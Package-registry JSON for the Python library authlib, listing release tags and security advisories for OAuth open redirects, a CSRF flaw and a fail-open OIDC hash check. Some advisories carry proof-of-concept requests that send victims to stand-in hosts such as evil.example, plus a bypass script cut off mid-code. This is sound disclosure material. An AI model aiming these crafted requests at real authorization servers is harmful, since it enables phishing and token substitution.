pi/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5.1/manifests"},{"name":"v0.5","sha":"96f7186da5d7eb0d561153277b93af0c7386dab7","kind":"commit","published_at":"2018-02-11T12:19:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.5","html_url":"https://github.com/authlib/authlib/releases/tag/v0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.5/manifests"},{"name":"v0.4.1","sha":"6f2970849fa2044740b66610508d8607f352e84b","kind":"commit","published_at":"2018-02-01T15:26:05.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.4.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4.1/manifests"},{"name":"v0.4","sha":"8014315fcba3f635256119573a8f237befc4405a","kind":"commit","published_at":"2018-01-31T12:49:09.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.4","html_url":"https://github.com/authlib/authlib/releases/tag/v0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.4/manifests"},{"name":"v0.3","sha":"06f609cbbfcbb0cba3476015ec472d86ee84f894","kind":"commit","published_at":"2017-12-24T12:38:11.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.3","html_url":"https://github.com/authlib/authlib/releases/tag/v0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.3/manifests"},{"name":"v0.2.1","sha":"117e88d7c02be5f5abbc91785fb0250366544956","kind":"commit","published_at":"2017-12-06T02:03:27.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.2.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2.1/manifests"},{"name":"v0.2","sha":"3ec75529da09dc2d238b84b9509da737c5ca241b","kind":"commit","published_at":"2017-11-25T12:33:22.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.2","html_url":"https://github.com/authlib/authlib/releases/tag/v0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.2/manifests"},{"name":"v0.1","sha":"baa74c624710f05ed26b651e552cbf8f8d02f0c2","kind":"commit","published_at":"2017-11-18T06:36:32.000Z","download_url":"https://codeload.github.com/authlib/authlib/tar.gz/v0.1","html_url":"https://github.com/authlib/authlib/releases/tag/v0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/authlib/authlib@v0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/authlib%2Fauthlib/tags/v0.1/manifests"}]},"repo_metadata_updated_at":"2026-06-13T18:11:44.444Z","dependent_packages_count":157,"downloads":130503737,"downloads_period":"last-month","dependent_repos_count":2180,"rankings":{"downloads":0.10299244852331889,"dependent_repos_count":0.2360813620800175,"dependent_packages_count":0.14989603039352103,"stargazers_count":1.122639904745705,"forks_count":2.665491471365363,"docker_downloads_count":0.6177592595487875,"average":0.8158100794427855},"purl":"pkg:pypi/authlib","advisories":[{"uuid":"GSA_kwCzR0hTQS13OHAyLXI3OTYtM3Ztcc4ABYRE","url":"https://github.com/advisories/GHSA-w8p2-r796-3vmq","title":"Authlib OAuth 2.0 has Open Redirect in Authorization API that allows attacker-controlled redirect_uri through unsupported response_type","description":"### Summary\nAuthlib's OAuth 2.0 authorization endpoint can be turned into an unauthenticated open redirect when a request uses an unsupported response_type and supplies an attacker-controlled redirect_uri.\n\nThe vulnerable behavior happens before client lookup and before any redirect URI validation. As a result, an attacker does not need a valid client registration, an authenticated user, or any prior state. A single request to the authorization endpoint is enough to obtain a 302 Location response to an arbitrary attacker-controlled URL.\n\nIt was confirmed that the vulnerable code is present in tag v1.6.6 and in the current HEAD under test (68e6ab3fdfc71a328b1966bad5c6aba0f7d0c2e1, git describe: v1.6.6-104-g68e6ab3f). The issue was dynamically reproduced locally on the current HEAD.\n\n### Details\nThe root cause is that `AuthorizationServer.get_authorization_grant()` copies the raw request\n  `redirect_uri` into an `UnsupportedResponseTypeError` before any client has been resolved and\n  before any redirect URI validation has happened:\n\n  ```python\n  # authlib/oauth2/rfc6749/authorization_server.py\n  raise UnsupportedResponseTypeError(\n      f\"The response type '{request.payload.response_type}' is not supported by the server.\",\n      request.payload.response_type,\n      redirect_uri=request.payload.redirect_uri,\n  )\n\n  That error object is later rendered by OAuth2Error.__call__(). If redirect_uri is set, Authlib\n  automatically returns a redirect response to that URI:\n\n  # authlib/oauth2/base.py\n  def __call__(self, uri=None):\n      if self.redirect_uri:\n          params = self.get_body()\n          loc = add_params_to_uri(self.redirect_uri, params, self.redirect_fragment)\n          return 302, \"\", [(\"Location\", loc)]\n      return super().__call__(uri=uri)\n\n  This means an unsupported response_type request can force the authorization server to redirect\n  to an attacker-controlled URL even when:\n\n  1. no valid client exists,\n  2. no grant matched the request,\n  3. no registered redirect_uri was ever checked.\n\n  This is not a contrived code path. It is reachable through the normal Authlib authorization\n  endpoint flow documented for Flask and Django integrations, where applications are told to call\n  server.get_consent_grant(...) and then server.handle_error_response(...) on OAuth2Error.\n\n  Relevant source and documentation references:\n\n  - authlib/oauth2/rfc6749/authorization_server.py\n  - authlib/oauth2/base.py\n  - docs/flask/2/authorization-server.rst\n  - docs/django/2/authorization-server.rst\n\n  ### PoC\n\n  Local test environment:\n\n  - Repository checkout: 68e6ab3fdfc71a328b1966bad5c6aba0f7d0c2e1\n  - git describe: v1.6.6-104-g68e6ab3f\n  - Python virtualenv: ./.venv\n  - Environment variable: AUTHLIB_INSECURE_TRANSPORT=true\n\n  Note: AUTHLIB_INSECURE_TRANSPORT=true was only used to allow local loopback HTTP reproduction.\n  It does not create the vulnerable behavior. In a real deployment the same logic is reachable\n  over HTTPS.\n\n  Run this exact PoC from the repository root:\n\n  export AUTHLIB_INSECURE_TRANSPORT=true\n  ./.venv/bin/python - \u003c\u003c'PY'\n  import os, json\n  from flask import Flask, request\n  from authlib.integrations.flask_oauth2 import AuthorizationServer\n  from authlib.oauth2 import OAuth2Error\n  from authlib.oauth2.rfc6749.grants import AuthorizationCodeGrant as _AuthorizationCodeGrant\n\n  os.environ[\"AUTHLIB_INSECURE_TRANSPORT\"] = \"true\"\n\n  class AuthorizationCodeGrant(_AuthorizationCodeGrant):\n      def save_authorization_code(self, code, request):\n          raise RuntimeError(\"not reached\")\n      def query_authorization_code(self, code, client):\n          return None\n      def delete_authorization_code(self, authorization_code):\n          pass\n      def authenticate_user(self, authorization_code):\n          return None\n\n  app = Flask(__name__)\n  app.secret_key = \"testing\"\n\n  server = AuthorizationServer(\n      app,\n      query_client=lambda client_id: None,\n      save_token=lambda token, request: None,\n  )\n  server.register_grant(AuthorizationCodeGrant)\n\n  @app.route(\"/oauth/authorize\", methods=[\"GET\", \"POST\"])\n  def authorize():\n      try:\n          grant = server.get_consent_grant(end_user=None)\n      except OAuth2Error as error:\n          return server.handle_error_response(request, error)\n      return server.create_authorization_response(grant=grant, grant_user=None)\n\n  with app.test_client() as c:\n      cases = {\n          \"without_redirect_uri\": \"/oauth/authorize?response_type=totally-unsupported\u0026state=s1\",\n          \"with_attacker_redirect_uri\": \"/oauth/authorize?response_type=totally-\n  unsupported\u0026redirect_uri=https%3A%2F%2Fevil.example%2Flanding\u0026state=s1\",\n      }\n      out = {}\n      for name, url in cases.items():\n          r = c.get(url)\n          out[name] = {\n              \"status\": r.status_code,\n              \"location\": r.headers.get(\"Location\"),\n              \"body\": r.get_data(as_text=True),\n          }\n      print(json.dumps(out, indent=2))\n  PY\n\n  Observed result:\n\n  {\n    \"without_redirect_uri\": {\n      \"status\": 400,\n      \"location\": null,\n      \"body\": \"{\\\"error\\\": \\\"unsupported_response_type\\\", \\\"error_description\\\": \\\"totally-\n  unsupported\\\", \\\"state\\\": \\\"s1\\\"}\"\n    },\n    \"with_attacker_redirect_uri\": {\n      \"status\": 302,\n      \"location\":\n  \"https://evil.example/landing?error=unsupported_response_type\u0026error_description=totally-unsupported\u0026state=s1\",                                                                                    \n      \"body\": \"\"\n    }\n  }\n\n  This demonstrates that the only difference between a local error and an external redirect is\n  whether the attacker supplies redirect_uri.\n\n  The same behavior was locally reproduced with the Django integration using RequestFactory; it\n  returned:\n\n  {\n    \"status\": 302,\n    \"location\":\n  \"https://evil.example/landing?error=unsupported_response_type\u0026error_description=totally-unsupported\u0026state=s1\",                                                                                    \n    \"body\": \"\"\n  }\n\n### Impact\n  This is an unauthenticated open redirect in an internet-facing authorization endpoint.\n\n  Who is impacted:\n\n  - Any deployment using Authlib's OAuth 2.0 authorization server and the documented authorization\n    endpoint flow.\n  - No special feature flag is required beyond running the authorization endpoint itself.\n\n  Attacker prerequisites:\n\n  - None beyond the ability to send a victim to a crafted authorization URL.\n\n  Practical harm:\n\n  - Phishing and credential theft by abusing a trusted authorization server domain as a\n    redirector.\n  - Bypass of domain-based allowlists that trust the authorization server's host.\n  - SSO / OAuth confusion in ecosystems where trusted authorization endpoints are expected to\n    reject unregistered redirect URIs before redirecting.\n\n  The issue is especially concerning because the redirect happens before client existence and\n  redirect URI legitimacy are established.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-08T17:52:04.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-w8p2-r796-3vmq","https://github.com/authlib/authlib/commit/3be08468201a7766a93012ce149ea12822cab096","https://github.com/advisories/GHSA-w8p2-r796-3vmq"],"source_kind":"github","identifiers":["GHSA-w8p2-r796-3vmq","CVE-2026-41479"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-08T18:00:08.159Z","updated_at":"2026-06-13T17:00:13.473Z","epss_percentage":0.00026,"epss_percentile":0.08006,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13OHAyLXI3OTYtM3Ztcc4ABYRE","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS13OHAyLXI3OTYtM3Ztcc4ABYRE","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.7.1","vulnerable_version_range":"= 1.7.0"},{"first_patched_version":"1.6.10","vulnerable_version_range":"\u003c 1.6.10"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS13OHAyLXI3OTYtM3Ztcc4ABYRE/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1yOTV4LXFmamotZmpqMs4ABWx-","url":"https://github.com/advisories/GHSA-r95x-qfjj-fjj2","title":"Authlib OIDC Implicit/Hybrid Authorization Vulnerable to Open Redirect","description":"### Summary\n\nAn unauthenticated open redirect in Authlib's `OpenIDImplicitGrant` and `OpenIDHybridGrant` authorization endpoint lets a remote attacker cause the authorization server to issue an HTTP 302 to an attacker-chosen URL by submitting an authorization request that omits the `openid` scope.\n\n### Details\n\n#### Vulnerable code\n\n`OpenIDImplicitGrant.validate_authorization_request` in `authlib/oidc/core/grants/implicit.py`:\n\n```python\ndef validate_authorization_request(self):\n    if not is_openid_scope(self.request.payload.scope):\n        raise InvalidScopeError(\n            \"Missing 'openid' scope\",\n            redirect_uri=self.request.payload.redirect_uri,  # ← raw, unvalidated\n            redirect_fragment=True,\n        )\n    redirect_uri = super().validate_authorization_request()\n    ...\n```\n\n`OpenIDHybridGrant.validate_authorization_request` in `authlib/oidc/core/grants/hybrid.py` shares the same pattern.\n\n#### Root cause\n\nBoth methods perform the `openid` scope presence check before delegating to `super().validate_authorization_request()`, which is where `AuthorizationEndpointMixin.validate_authorization_redirect_uri` validates the requested `redirect_uri` against the client's `check_redirect_uri(...)`. The `InvalidScopeError` thrown by the scope check therefore carries attacker-controlled `self.request.payload.redirect_uri`.\n\n`OAuth2Error.__call__` in `authlib/oauth2/base.py` renders any error with a non-empty `redirect_uri` as an HTTP 302:\n\n```python\ndef __call__(self, uri=None):\n    if self.redirect_uri:\n        params = self.get_body()\n        loc = add_params_to_uri(self.redirect_uri, params, self.redirect_fragment)\n        return 302, \"\", [(\"Location\", loc)]\n    return super().__call__(uri=uri)\n```\n\nA malformed authorization request that selects `OpenIDImplicitGrant` or `OpenIDHybridGrant` and omits the `openid` scope is therefore redirected to a fully attacker-chosen URL.\n\nThis is a variant of the issue fixed in commit [`3be08468`](https://github.com/authlib/authlib/commit/3be08468) (\"fix: redirecting to unvalidated `redirect_uri` on `UnsupportedResponseTypeError`\") that was missed in the OIDC Implicit and Hybrid grants.\n\n#### Preconditions\n\n1. The server registers `OpenIDImplicitGrant` or `OpenIDHybridGrant` (standard OIDC Implicit or Hybrid flow support).\n2. The attacker's request uses a `response_type` that matches either grant: `id_token`, `id_token token`, `code id_token`, `code token`, or `code id_token token`.\n3. `scope` does not contain `openid`.\n4. Any `redirect_uri` value.\n\nNo user authentication, no consent, no valid session, no CSRF token, and — notably — no valid `client_id` are required. The scope check runs before any client lookup, so any `client_id` value (including nonexistent ones) reaches the vulnerable code path.\n\n### PoC\n\nThe following unauthenticated GET is sufficient to induce the authorization server to redirect a victim's browser to an attacker-controlled URL:\n\n```\nGET /oauth/authorize\n    ?response_type=id_token\n    \u0026client_id=anything\n    \u0026scope=profile\n    \u0026redirect_uri=https%3A%2F%2Fevil.example.com%2Fphish\n    \u0026state=s\u0026nonce=n  HTTP/1.1\nHost: victim-op.example\n```\n\nServer response:\n\n```\nHTTP/1.1 302 Found\nLocation: https://evil.example.com/phish#error=invalid_scope\u0026error_description=Missing+%27openid%27+scope\u0026state=s\n```\n\n### Impact\n\n- Open redirect from a trusted authorization server origin. Victims receiving a phishing link see the legitimate OIDC provider's domain in the URL bar at the moment they click. The authorization server itself issues the 302 to the attacker's page, lending the attacker's landing page the OP's reputation and potentially satisfying domain-allow-list controls that trust the OP.\n- Phishing / credential harvesting leverage. The attacker's page can mimic the legitimate OP's consent screen or a relying-party error page to solicit credentials, MFA codes, or to continue a downstream confused-deputy attack.\n- RFC violation. RFC 6749 §4.1.2.1 and RFC 9700 (OAuth 2.0 Security BCP) §4.11 both state that an authorization server MUST NOT perform redirection to a `redirect_uri` that has not been validated against the client's registered URIs, even in error responses. The `state` parameter is echoed back, giving the attacker site a stable correlator.\n- No direct token/code leak. This flaw fires before any authorization decision, so no authorization codes, ID tokens, or access tokens are disclosed. The impact is limited to open-redirect phishing leverage. Combined with other issues (e.g., downstream SSO trust chains) it may contribute to account-takeover chains; on its own it is a Medium-severity open redirect.\n\n#### Affected deployments\n\nAny application using Authlib as an OIDC provider that registers `OpenIDImplicitGrant` and/or `OpenIDHybridGrant` — i.e. anyone supporting the Implicit flow or the Hybrid flow (`response_type=code id_token`, etc.) — is affected. Clients of an Authlib-based OP are not directly affected; this is a server-side issue.\n\nAuthorization servers that only register the plain `AuthorizationCodeGrant` (code flow, with or without PKCE and the `OpenIDCode` extension) are not affected by this specific variant: the code-flow grant validates `redirect_uri` before raising scope errors. If you were affected by the sibling issue fixed in `3be08468` (`UnsupportedResponseTypeError`), you should already be on `1.6.10` or later; this advisory is independent of that fix.\n\n### Suggested fix\n\nThe attached `fix-oidc-open-redirect.patch` reorders each method to delegate to its super (or call `validate_code_authorization_request` for Hybrid) first, and then performs the `openid`-scope check with the validated `redirect_uri` variable.\n\n```python\n# authlib/oidc/core/grants/implicit.py\ndef validate_authorization_request(self):\n    redirect_uri = super().validate_authorization_request()   # runs client + redirect_uri validation\n    if not is_openid_scope(self.request.payload.scope):\n        raise InvalidScopeError(\n            \"Missing 'openid' scope\",\n            redirect_uri=redirect_uri,                         # validated\n            redirect_fragment=True,\n        )\n    try:\n        validate_nonce(self.request, self.exists_nonce, required=True)\n    except OAuth2Error as error:\n        error.redirect_uri = redirect_uri\n        error.redirect_fragment = True\n        raise error\n    return redirect_uri\n```\n\nAn equivalent transform is applied to `OpenIDHybridGrant.validate_authorization_request`, invoking `validate_code_authorization_request` first and only then checking `is_openid_scope`.\n\nAlternatively, inline a `client = query_client(request.payload.client_id)` + `client.check_redirect_uri(request.payload.redirect_uri)` guard before populating `redirect_uri` on the error — the pattern used in `3be08468`.\n\nThe patch also adds regression tests analogous to `test_unsupported_response_type_does_not_redirect` from commit `3be08468`, asserting `rv.status_code == 400` and `rv.headers.get(\"Location\") is None` for an unregistered `redirect_uri` with a non-`openid` scope.\n\n### Workarounds\n\nNo clean server-side workaround exists short of patching. Partial mitigations:\n\n- Unregister `OpenIDImplicitGrant` and `OpenIDHybridGrant` if the Implicit and Hybrid flows are not required. (RFC 9700 deprecates the Implicit flow and discourages Hybrid flows, so this is recommended anyway.)\n- Front the `/authorize` endpoint with a reverse proxy rule that rejects requests containing both a `redirect_uri` parameter and a `scope` that does not include `openid` when `response_type` matches the vulnerable set. This is fragile and not recommended as a primary control.\n\n### References\n\n- RFC 6749, §4.1.2.1 — Error Response (OAuth 2.0 authorization endpoint)\n- RFC 9700, §4.11 — Redirect URI validation\n- OpenID Connect Core 1.0, §3.2.2.6 / §3.3.2.6 — Authentication Error Response\n- Authlib commit [`3be08468`](https://github.com/authlib/authlib/commit/3be08468) — prior fix for the same class of issue in `UnsupportedResponseTypeError` (Authlib 1.6.10)\n- Authlib source (by symbol; verified in commit `5d2e603e`):\n  - `OpenIDImplicitGrant.validate_authorization_request` — `authlib/oidc/core/grants/implicit.py`\n  - `OpenIDHybridGrant.validate_authorization_request` — `authlib/oidc/core/grants/hybrid.py`\n  - `OAuth2Error.__call__` — `authlib/oauth2/base.py` (renders errors with `redirect_uri` as HTTP 302)\n  - `AuthorizationEndpointMixin.validate_authorization_redirect_uri` — `authlib/oauth2/rfc6749/grants/base.py` (the validation that is bypassed)","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-05-13T01:36:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.1,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-r95x-qfjj-fjj2","https://github.com/authlib/authlib/releases/tag/v1.6.12","https://github.com/authlib/authlib/releases/tag/v1.7.1","https://nvd.nist.gov/vuln/detail/CVE-2026-44681","https://github.com/pypa/advisory-database/tree/main/vulns/authlib/PYSEC-2026-188.yaml","https://github.com/advisories/GHSA-r95x-qfjj-fjj2"],"source_kind":"github","identifiers":["GHSA-r95x-qfjj-fjj2","CVE-2026-44681"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-05-13T02:00:08.274Z","updated_at":"2026-06-09T13:00:34.751Z","epss_percentage":0.0004,"epss_percentile":0.12262,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yOTV4LXFmamotZmpqMs4ABWx-","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1yOTV4LXFmamotZmpqMs4ABWx-","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.12","vulnerable_version_range":"\u003c= 1.6.11"},{"first_patched_version":"1.7.1","vulnerable_version_range":"= 1.7.0"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1yOTV4LXFmamotZmpqMs4ABWx-/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1qajhjLW1tajMtbW1nds4ABVZr","url":"https://github.com/advisories/GHSA-jj8c-mmj3-mmgv","title":"Authlib: Cross-site request forging when using cache","description":"### Summary\n\nThere is no CSRF protection on the cache feature on most integrations clients.\n\n### Details\nIn `authlib.integrations.starlette_client.OAuth`, no CSRF protection is set up when using the cache parameter. When _not_ using the cache parameter, the use of SessionMiddleware ties the client to the auth state, preventing CSRF attacks. With the cache, there is no such mechanism. Other integratons have the same issue, it's not just starlette.\n\nThe state parameter is taken from the callback URL and the state is fetched from the cache without checking that it is the same client calling the redirect endpoint as was the one that initiated the auth flow.\n\nThis issue is documented in RFC 6749 section 10.12:\nhttps://datatracker.ietf.org/doc/html/rfc6749#section-10.12\n\n### PoC\n- Set up a Starlette integration with a cache\n- The attacker starts the auth flow up until before the callback URL is followed.\n- The attacked sends the redirect URL to the victim\n- The victim now completes the authorisation\n\n### Impact\nThis impacts all users that use the cache to store auth state.\n\nAll users will be vulnerable to CSRF attacks and may have an attacker's account tied to their own.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-04-16T22:38:03.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.4,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N","references":["https://github.com/authlib/authlib/security/advisories/GHSA-jj8c-mmj3-mmgv","https://nvd.nist.gov/vuln/detail/CVE-2026-41425","https://github.com/pypa/advisory-database/tree/main/vulns/authlib/PYSEC-2026-25.yaml","https://github.com/advisories/GHSA-jj8c-mmj3-mmgv"],"source_kind":"github","identifiers":["GHSA-jj8c-mmj3-mmgv","CVE-2026-41425"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-04-16T23:00:09.229Z","updated_at":"2026-06-06T12:00:57.173Z","epss_percentage":0.00023,"epss_percentile":0.0663,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qajhjLW1tajMtbW1nds4ABVZr","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1qajhjLW1tajMtbW1nds4ABVZr","packages":[{"ecosystem":"pypi","package_name":"authlib","versions":[{"first_patched_version":"1.6.11","vulnerable_version_range":"\u003c 1.6.11"}],"purl":"pkg:pypi/authlib"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1qajhjLW1tajMtbW1nds4ABVZr/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1tMzQ0LWY1NXctMm02as4ABTt6","url":"https://github.com/advisories/GHSA-m344-f55w-2m6j","title":"Authlib: Fail-Open Cryptographic Verification in OIDC Hash Binding","description":"## 1. Executive Summary\n\nA critical library-level vulnerability was identified in the **Authlib** Python library concerning the validation of OpenID Connect (OIDC) ID Tokens. Specifically, the internal hash verification logic (`_verify_hash`) responsible for validating the `at_hash` (Access Token Hash) and `c_hash` (Authorization Code Hash) claims exhibits a **fail-open** behavior when encountering an unsupported or unknown cryptographic algorithm. \n\nThis flaw allows an attacker to bypass mandatory integrity protections by supplying a forged ID Token with a deliberately unrecognized `alg` header parameter. The library intercepts the unsupported state and silently returns `True` (validation passed), inherently violating fundamental cryptographic design principles and direct OIDC specifications.\n\n---\n\n## 2. Technical Details \u0026 Root Cause\n\nThe vulnerability resides within the `_verify_hash(signature, s, alg)` function in `authlib/oidc/core/claims.py`:\n\n```python\ndef _verify_hash(signature, s, alg):\n    hash_value = create_half_hash(s, alg)\n    if not hash_value:        # ← VULNERABILITY: create_half_hash returns None for unknown algorithms\n        return True            # ← BYPASS: The verification silently passes\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\nWhen an unsupported algorithm string (e.g., `\"XX999\"`) is processed by the helper function `create_half_hash` in `authlib/oidc/core/util.py`, the internal `getattr(hashlib, hash_type, None)` call fails, and the function correctly returns `None`. \n\nHowever, instead of triggering a `Fail-Closed` cryptographic state (raising an exception or returning `False`), the `_verify_hash` function misinterprets the `None` return value and explicitly returns `True`. \n\nBecause developers rely on the standard `.validate()` method provided by Authlib's `IDToken` class—which internally calls this flawed function—there is **no mechanism for the implementing developer to prevent this bypass**. It is a strict library-level liability.\n\n---\n\n## 3. Attack Scenario\n\nThis vulnerability exposes applications utilizing Hybrid or Implicit OIDC flows to **Token Substitution Attacks**.\n\n1. An attacker initiates an OIDC flow and receives a legitimately signed ID Token, but wishes to substitute the bound Access Token (`access_token`) or Authorization Code (`code`) with a malicious or mismatched one.\n2. The attacker re-crafts the JWT header of the ID Token, setting the `alg` parameter to an arbitrary, unsupported value (e.g., `{\"alg\": \"CUSTOM_ALG\"}`).\n3. The server uses Authlib to validate the incoming token. The JWT signature validation might pass (or be previously cached/bypassed depending on state), progressing to the claims validation phase.\n4. Authlib attempts to validate the `at_hash` or `c_hash` claims. \n5. Because `\"CUSTOM_ALG\"` is unsupported by `hashlib`, `create_half_hash` returns `None`.\n6. Authlib's `_verify_hash` receives `None` and silently returns `True`.\n7. **Result:** The application accepts the substituted/malicious Access Token or Authorization Code without any cryptographic verification of the binding hash.\n\n---\n\n## 4. Specification \u0026 Standards Violations\n\nThis explicit fail-open behavior violates multiple foundational RFCs and Core Specifications. A secure cryptographic library **MUST** fail and reject material when encountering unsupported cryptographic parameters.\n\n**OpenID Connect Core 1.0**\n* **§ 3.2.2.9 (Access Token Validation):** \"If the ID Token contains an `at_hash` Claim, the Client MUST verify that the hash value of the Access Token matches the value of the `at_hash` Claim.\" Silencing the validation check natively contradicts this absolute requirement.\n* **§ 3.3.2.11 (Authorization Code Validation):** Identically mandates the verification of the `c_hash` Claim.\n\n**IETF JSON Web Token (JWT) Best Current Practices (BCP)**\n* **RFC 8725 § 3.1.1:** \"Libraries MUST NOT trust the signature without verifying it according to the algorithm... if validation fails, the token MUST be rejected.\" Authlib's implementation effectively \"trusts\" the hash when it cannot verify the algorithm.\n\n**IETF JSON Web Signature (JWS)**\n* **RFC 7515 § 5.2 (JWS Validation):** Cryptographic validations must reject the payload if the specified parameters are unsupported. By returning `True` for an `UnsupportedAlgorithm` state, Authlib violates robust application security logic.\n\n---\n\n## 5. Remediation Recommendation\n\nThe `_verify_hash` function must be patched to enforce a `Fail-Closed` posture. If an algorithm is unsupported and cannot produce a hash for comparison, the validation **must** fail immediately.\n\n**Suggested Patch (`authlib/oidc/core/claims.py`):**\n\n```python\ndef _verify_hash(signature, s, alg):\n    hash_value = create_half_hash(s, alg)\n    if hash_value is None:\n        # FAIL-CLOSED: The algorithm is unsupported, reject the token.\n        return False\n    return hmac.compare_digest(hash_value, to_bytes(signature))\n```\n\n---\n\n## 6. Proof of Concept (PoC)\n\nThe following standalone script mathematically demonstrates the vulnerability across the Root Cause, Implicit Flow (`at_hash`), Hybrid Flow (`c_hash`), and the entire attack surface. It utilizes Authlib's own validation logic to prove the Fail-Open behavior.```bash\n\n```bash\npython3 -m venv venv\nsource venv/bin/activate\npip install authlib cryptography\npython3 -c \"import authlib; print(authlib.__version__)\"\n# → 1.6.8\n```\n\n```python\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\n@title          OIDC at_hash / c_hash Verification Bypass\n@affected       authlib \u003c= 1.6.8\n@file           authlib/oidc/core/claims.py :: _verify_hash()\n@notice         _verify_hash() retorna True cuando create_half_hash() retorna\n                None (alg no soportado), causando Fail-Open en la verificacion\n                de binding entre ID Token y Access Token / Authorization Code.\n@dev            Reproduce el bypass directamente contra el codigo de authlib\n                sin mocks. Todas las llamadas son al modulo real instalado.\n\"\"\"\n\nimport hmac\nimport hashlib\nimport base64\nimport time\n\nimport authlib\nfrom authlib.common.encoding   import to_bytes\nfrom authlib.oidc.core.util    import create_half_hash\nfrom authlib.oidc.core.claims  import IDToken, HybridIDToken\nfrom authlib.oidc.core.claims  import _verify_hash as authlib_verify_hash\n\n# ─── helpers ──────────────────────────────────────────────────────────────────\n\nR   = \"\\033[0m\"\nRED = \"\\033[91m\"\nGRN = \"\\033[92m\"\nYLW = \"\\033[93m\"\nCYN = \"\\033[96m\"\nBLD = \"\\033[1m\"\nDIM = \"\\033[2m\"\n\ndef header(title):\n    print(f\"\\n{CYN}{'─' * 64}{R}\")\n    print(f\"{BLD}{title}{R}\")\n    print(f\"{CYN}{'─' * 64}{R}\")\n\ndef ok(msg):   print(f\"  {GRN}[OK]      {R}{msg}\")\ndef fail(msg): print(f\"  {RED}[BYPASS]  {R}{BLD}{msg}{R}\")\ndef info(msg): print(f\"  {DIM}          